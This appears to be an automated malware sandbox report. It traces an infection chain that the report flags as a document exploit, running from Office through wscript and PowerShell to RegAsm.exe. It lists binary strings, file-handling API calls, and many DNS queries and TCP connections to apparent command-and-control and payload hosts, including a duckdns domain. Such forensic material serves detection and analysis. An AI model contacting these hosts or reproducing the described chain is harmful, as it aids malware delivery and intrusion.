Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	16_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	16_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	16_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	16_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0044E879 FindFirstFileExA,	16_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	16_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040783C FindFirstFileW,FindNextFileW,	16_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	16_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	16_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	16_2_0040BD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	16_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_10006580 FindFirstFileExA,	16_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0040AE51 FindFirstFileW,FindNextFileW,	18_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	19_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	21_2_00407898

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

16_2_00407C97

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe	Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: shortify.pro
Source: global traffic	DNS query: name: shortify.pro
Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: shortify.pro
Source: global traffic	DNS query: name: shortify.pro
Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: shortify.pro
Source: global traffic	DNS query: name: shortify.pro
Source: global traffic	DNS query: name: shortify.pro
Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: shortify.pro
Source: global traffic	DNS query: name: shortify.pro
Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: hq.ax
Source: global traffic	DNS query: name: shortify.pro
Source: global traffic	DNS query: name: shortify.pro
Source: global traffic	DNS query: name: iwarsut775laudrye2.duckdns.org
Source: global traffic	DNS query: name: iwarsut775laudrye2.duckdns.org
Source: global traffic	DNS query: name: iwarsut775laudrye2.duckdns.org
Source: global traffic	DNS query: name: geoplugin.net
Source: global traffic	DNS query: name: asociatiatraditiimaria.ro
Source: global traffic	DNS query: name: asociatiatraditiimaria.ro
Source: global traffic	DNS query: name: new.quranushaiqer.org.sa

Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 198.46.176.133:80
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 178.237.33.50:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
